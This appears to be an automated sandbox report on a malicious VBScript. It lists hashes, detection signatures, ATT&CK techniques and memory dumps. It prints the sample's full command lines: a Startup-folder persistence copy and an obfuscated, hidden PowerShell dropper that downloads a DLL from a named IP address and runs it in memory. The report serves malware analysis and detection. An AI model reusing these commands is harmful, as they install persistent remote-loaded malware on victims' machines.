fa0c16419a4f2e838f7f9f72f252b5f391da16d47910c1a7a84d8e3b01d1b550

General

Target

92baf7d1d57f1c7c6368c79646304ddb.vbs
Size

488KB
MD5

92baf7d1d57f1c7c6368c79646304ddb
SHA1

243ea00cea30c24c463b2263479502481458ec41
SHA256

fa0c16419a4f2e838f7f9f72f252b5f391da16d47910c1a7a84d8e3b01d1b550
SHA512

7ddb663e69b9cec619c9211052d3df31b942d7cc56c6c9da4d469ce09c072559eb24544f64974a42c36e9eeb324c30a22029a93e2f04dceeb036c66bc9020c60

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.49/ramdes/treboldll.txt

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 2000 powershell.exe

flow	pid	process
4	2000	powershell.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VHK.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VHK.vbs	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

472 PING.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1632 powershell.exe
376 powershell.exe
2000 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1632 powershell.exe
Token: SeDebugPrivilege 376 powershell.exe
Token: SeDebugPrivilege 2000 powershell.exe

pid	process
472	PING.EXE

pid	process
1632	powershell.exe
376	powershell.exe
2000	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	376	powershell.exe
Token: SeDebugPrivilege	2000	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

WScript.execmd.exepowershell.exe

description	pid	process	target process
PID 1220 wrote to memory of 1192	1220	WScript.exe	cmd.exe
PID 1220 wrote to memory of 1192	1220	WScript.exe	cmd.exe
PID 1220 wrote to memory of 1192	1220	WScript.exe	cmd.exe
PID 1192 wrote to memory of 472	1192	cmd.exe	PING.EXE
PID 1192 wrote to memory of 472	1192	cmd.exe	PING.EXE
PID 1192 wrote to memory of 472	1192	cmd.exe	PING.EXE
PID 1192 wrote to memory of 1632	1192	cmd.exe	powershell.exe
PID 1192 wrote to memory of 1632	1192	cmd.exe	powershell.exe
PID 1192 wrote to memory of 1632	1192	cmd.exe	powershell.exe
PID 1220 wrote to memory of 376	1220	WScript.exe	powershell.exe
PID 1220 wrote to memory of 376	1220	WScript.exe	powershell.exe
PID 1220 wrote to memory of 376	1220	WScript.exe	powershell.exe
PID 376 wrote to memory of 2000	376	powershell.exe	powershell.exe
PID 376 wrote to memory of 2000	376	powershell.exe	powershell.exe
PID 376 wrote to memory of 2000	376	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\92baf7d1d57f1c7c6368c79646304ddb.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1220

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\92baf7d1d57f1c7c6368c79646304ddb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VHK.vbs')
2⤵
- Suspicious use of WriteProcessMemory
PID:1192

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 10
3⤵
- Runs ping.exe
PID:472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\92baf7d1d57f1c7c6368c79646304ddb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VHK.vbs')
3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂Dk⁂MQ⁂u⁂DI⁂N⁂⁂x⁂C4⁂MQ⁂5⁂C4⁂N⁂⁂5⁂C8⁂cgBh⁂G0⁂Z⁂Bl⁂HM⁂LwB0⁂HI⁂ZQBi⁂G8⁂b⁂Bk⁂Gw⁂b⁂⁂u⁂HQ⁂e⁂B0⁂Cc⁂KQ⁂p⁂Ds⁂WwBT⁂Hk⁂cwB0⁂GU⁂bQ⁂u⁂EE⁂c⁂Bw⁂EQ⁂bwBt⁂GE⁂aQBu⁂F0⁂Og⁂6⁂EM⁂dQBy⁂HI⁂ZQBu⁂HQ⁂R⁂Bv⁂G0⁂YQBp⁂G4⁂LgBM⁂G8⁂YQBk⁂Cg⁂J⁂BE⁂Ew⁂T⁂⁂p⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂QwBs⁂GE⁂cwBz⁂Ew⁂aQBi⁂HI⁂YQBy⁂Hk⁂Mw⁂u⁂EM⁂b⁂Bh⁂HM⁂cw⁂x⁂Cc⁂KQ⁂u⁂Ec⁂ZQB0⁂E0⁂ZQB0⁂Gg⁂bwBk⁂Cg⁂JwBS⁂HU⁂bg⁂n⁂Ck⁂LgBJ⁂G4⁂dgBv⁂Gs⁂ZQ⁂o⁂CQ⁂bgB1⁂Gw⁂b⁂⁂s⁂C⁂⁂WwBv⁂GI⁂agBl⁂GM⁂d⁂Bb⁂F0⁂XQ⁂g⁂Cg⁂JwB0⁂Hg⁂d⁂⁂u⁂DQ⁂cwBu⁂C8⁂d⁂Bz⁂GU⁂d⁂⁂v⁂Dk⁂N⁂⁂u⁂Dk⁂MQ⁂u⁂DE⁂N⁂⁂y⁂C4⁂MQ⁂5⁂C8⁂Lw⁂6⁂H⁂⁂d⁂B0⁂Gg⁂Jw⁂p⁂Ck⁂';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/treboldll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.4sn/tset/94.91.142.19//:ptth'))"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2000

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
3d94466afacf69f37dd524b1b0449713

SHA1
8c8e11170166a85a06f233042707a44d36167047

SHA256
1041a8ead4a4d25d70c34885f24b125398c8812c9ac227c5d5c10d232a190bd2

SHA512
7fb3ab46fd31852153c4cf0b30e04ee507cacc1bf7e01f851e5ebe2b5af61b656cd6fe6f059ac848680db226f10d7e67a49df7afa17313fbebab0fa75105bbf4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
3d94466afacf69f37dd524b1b0449713

SHA1
8c8e11170166a85a06f233042707a44d36167047

SHA256
1041a8ead4a4d25d70c34885f24b125398c8812c9ac227c5d5c10d232a190bd2

SHA512
7fb3ab46fd31852153c4cf0b30e04ee507cacc1bf7e01f851e5ebe2b5af61b656cd6fe6f059ac848680db226f10d7e67a49df7afa17313fbebab0fa75105bbf4

Download Submit
memory/376-67-0x00000000028F0000-0x00000000028F2000-memory.dmp

Filesize
8KB

Download
memory/376-74-0x00000000028FB000-0x000000000291A000-memory.dmp

Filesize
124KB

Download
memory/376-68-0x00000000028F2000-0x00000000028F4000-memory.dmp

Filesize
8KB

Download
memory/376-69-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/376-62-0x0000000000000000-mapping.dmp

Download
memory/376-65-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmp

Filesize
11.4MB

Download
memory/472-55-0x0000000000000000-mapping.dmp

Download
memory/1192-54-0x0000000000000000-mapping.dmp

Download
memory/1220-53-0x000007FEFC511000-0x000007FEFC513000-memory.dmp

Filesize
8KB

Download
memory/1632-60-0x00000000028D2000-0x00000000028D4000-memory.dmp

Filesize
8KB

Download
memory/1632-66-0x00000000028DB000-0x00000000028FA000-memory.dmp

Filesize
124KB

Download
memory/1632-59-0x00000000028D0000-0x00000000028D2000-memory.dmp

Filesize
8KB

Download
memory/1632-61-0x00000000028D4000-0x00000000028D7000-memory.dmp

Filesize
12KB

Download
memory/1632-58-0x000007FEF3820000-0x000007FEF437D000-memory.dmp

Filesize
11.4MB

Download
memory/1632-56-0x0000000000000000-mapping.dmp

Download
memory/2000-70-0x0000000000000000-mapping.dmp

Download
memory/2000-73-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmp

Filesize
11.4MB

Download
memory/2000-75-0x00000000022B0000-0x00000000022B2000-memory.dmp

Filesize
8KB

Download
memory/2000-76-0x00000000022B2000-0x00000000022B4000-memory.dmp

Filesize
8KB

Download
memory/2000-77-0x00000000022B4000-0x00000000022B7000-memory.dmp

Filesize
12KB

Download
memory/2000-78-0x00000000022BB000-0x00000000022DA000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing